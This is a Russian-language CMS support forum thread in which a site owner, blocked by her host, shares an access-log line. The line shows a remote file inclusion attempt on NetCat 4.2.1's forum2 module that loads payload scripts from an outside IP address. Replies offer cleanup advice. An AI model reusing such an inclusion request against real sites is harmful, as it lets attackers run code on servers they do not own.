Регистрация
Вход через соцсети
Восстановление пароля

Есть ли в НетКате черные дыры?

Новый топик
12.03.2012, 08:53
Ответить | Цитировать
Svetlana
VITA-PROG

Зарегистрирован:
2011-02-03
Сообщений: 5

Хостер заблокировал мой аккаунт сообщив: "На Вашем аккаунте запускаются сторонние perl-скрипты, они создают повышенную нагрузку на сервере."
В процессе анализа логов были обнаружены следующие записи, см. следующий файл.
Например,
Код:
/netcat/modules/forum2/function.inc.php?MODULE_FOLDER=
http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??ht
tp://58.141.76.253:8080/design07/admin/menu/phpimg/pblinks.txt?? HT
TP/1.1" 200 569 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"

Из этого я предположила, что какой-то злоумышленник загружает свои скрипты из интернета по средствам какой-то дыры в cms, которые в свою очередь и создают повышенную нагрузку на сервере хостера. Возможно ли такое?
Версия NetCat Standard 4.2.1
12.03.2012, 10:13
Ответить | Цитировать
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

Цитата:
Возможно ли такое?

Да, возможно.

Варианты взлома:
1. Через FTP, т.е. кто-то как-то получил доступ к вашему сайту через фтп, внес правки в код и пользуется.
2. Через хостера, нерадивые сотрудники хостера со всеми вытекающими...
3. Дырка в CMS.
4. Дырка в коде разработчика, т.е. того, кто вам сайт настраивал.

Возможные действия:
1. Перезапишите файлы движка с дистриутива на сайт.
2. Можете поставить копироваться файлы сайта на ваш компьютер предварительно включив антивирус, если вредный код носит массовый характер, то антивирус его найдет.
3. Обновитесь до 4.62
4. Желательно провести аудит сайта как и движка так и БД (бекдоры могут и в БД храниться)
5. Зайдите через SSH и наберите команду ps -aux и покиляйте ненужные процессы, на котрорые хостер жалуется.

К сведению:
1. Модуль мониторинга
2. Модуль архивирования

Temet nosce...
12.03.2012, 14:23
Ответить | Цитировать
Svetlana
VITA-PROG

Зарегистрирован:
2011-02-03
Сообщений: 5

Спасибо за ответ!

Варианты взлома:
1. Ничтожновероятно, можно сказать, что отпадает. Тем более, что все файлы cms оставались неизменными.
2. Ну, тут уж может быть что угодно, но скорее я склоняюсь к варианту 3:
3. Версия системы 4.2.1. Возможно дырка есть, но как узнать точнее?
4. Этот вариант отпадает, так как сайт можно сказать "голый" и сделан без каких либо дополнительных наворотов и настроек.

Действия:
1. cms переустановлена.
2. Не дало результата.
3. Обновила систему до 4.7 на всякий случай.
4. БД проверена.
5. К сожалению на хостинге нет возможности килять процессы, но хостер, похоже, сам это сделал, когда приостановил работу хостинга.

На данный момент сайт запущен. Пока в логах нет новых записей с попытками доступа. Буду периодически просматривать логи. Хостер проинформирован. Если ситуация повторится, значит уязвимость не устранена.
И всё же остаётся вопрос: была ли это дырка в cms?
13.03.2012, 12:09
Ответить | Цитировать
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

Цитата:
была ли это дырка в cms?

за неимением логов и доступа к вашему сайту остается только гадать.

по приведенному логу видно, что пытаются подпихнуть внешний пхп скрипт и не более того, попробуйте теже самые запросы провести и посмотрите на результат.

Temet nosce...
23.01.2014, 16:46
Ответить | Цитировать
Гость
Гость

fdsagah
23.01.2014, 16:47
Ответить | Цитировать
Гость
Гость

faewgh
198 196 2014-01-23 16:47:46 11959
Описание проекта